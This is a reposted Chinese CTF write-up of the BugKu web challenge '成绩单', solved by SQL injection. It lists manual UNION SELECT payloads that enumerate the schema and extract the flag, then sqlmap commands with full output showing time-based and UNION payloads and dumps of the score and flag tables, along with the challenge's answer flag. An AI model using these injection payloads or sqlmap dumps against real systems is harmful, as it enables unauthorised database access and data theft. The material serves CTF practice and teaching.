BugKuCTF WEB 成绩单
生活随笔
收集整理的這篇文章主要介紹了
BugKuCTF WEB 成绩单
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
http://123.206.87.240:8002/chengjidan/
?
題解:
版本一
輸入0' union select database(),2,3,4 #
數(shù)據(jù)庫(kù)名:skctf_flag
輸入0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'#?
數(shù)據(jù)庫(kù)表名:fl4g??
輸入0' union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#
數(shù)據(jù)庫(kù)列名:skctf_flag
輸入0' union select skctf_flag,2,3,4 from fl4g#
flag:BUGKU{Sql_INJECT0N_4813drd8hz4}?
版本二
工具:sqlmap
sqlmap檢測(cè)sql注入
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"?結(jié)果
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests: --- Parameter: id (POST)Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'fELh'='fELhType: UNION queryTitle: Generic UNION query (NULL) - 4 columnsPayload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP --- [11:01:58] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12數(shù)據(jù)庫(kù):mysql
?
?列舉數(shù)據(jù)庫(kù)
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs結(jié)果
available databases [2]: [*] information_schema [*] skctf_flag數(shù)據(jù)庫(kù):skctf_flag
?
列舉數(shù)據(jù)庫(kù)skctf_flag的表?
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump結(jié)果
Database: skctf_flag [2 tables] +------+ | fl4g | | sc | +------+skctf_flag的數(shù)據(jù)表:
fl4g
sc
?
?列舉內(nèi)容
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump結(jié)果?
Database: skctf_flag Table: sc [3 entries] +----+------+------+---------+---------+ | id | name | math | chinese | english | +----+------+------+---------+---------+ | 1 | 龍龍龍 | 60 | 70 | 60 | | 2 | 浩兒 | 70 | 74 | 84 | | 3 | 靜靜 | 80 | 90 | 85 | +----+------+------+---------+---------+[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv' [11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................ (done) [11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y 1 [11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) [11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times BUGKU[11:18:42] [ERROR] invalid character detected. retrying.. [11:18:42] [WARNING] increasing time delay to 3 seconds {Sq[11:20:01] [ERROR] invalid character detected. retrying.. [11:20:01] [WARNING] increasing time delay to 4 seconds l_INJE[11:21:48] [ERROR] invalid character detected. retrying.. [11:21:48] [WARNING] increasing time delay to 5 seconds CT0N_4[11:24:01] [ERROR] invalid character detected. retrying.. [11:24:01] [WARNING] increasing time delay to 6 seconds 81[11:24:54] [ERROR] invalid character detected. retrying.. [11:24:54] [WARNING] increasing time delay to 7 seconds 3dr[11:26:24] [ERROR] invalid character detected. retrying.. [11:26:24] [WARNING] increasing time delay to 8 seconds d[11:27:10] [ERROR] invalid character detected. retrying.. [11:27:10] [WARNING] increasing time delay to 9 seconds 8hz4} Database: skctf_flag Table: fl4g [1 entry] +---------------------------------+ | skctf_flag | +---------------------------------+ | BUGKU{Sql_INJECT0N_4813drd8hz4} | +---------------------------------+flag:BUGKU{Sql_INJECT0N_4813drd8hz4}?
總結(jié)
以上是生活随笔為你收集整理的BugKuCTF WEB 成绩单的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: BugKuCTF WEB 备份是个好习惯
- 下一篇: Asteroids